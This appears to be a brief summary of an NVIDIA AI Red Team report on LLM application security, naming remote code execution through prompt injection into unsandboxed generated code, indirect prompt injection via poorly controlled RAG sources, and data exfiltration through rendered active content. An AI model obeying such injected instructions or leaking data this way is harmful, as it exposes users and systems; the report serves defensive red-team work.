Practical LLM Security Advice from the NVIDIA AI Red Team - NVIDIA Developer
The NVIDIA AI Red Team identifies critical vulnerabilities in LLM applications, including remote code execution (RCE) via prompt injection when executing unsandboxed LLM-generated code. Further risks involve data leakage and indirect prompt injection through insecure access controls in Retrieval-Augmented Generation (RAG) data sources, and data exfiltration facilitated by active content rendering in LLM outputs.
Source: Original Report ↗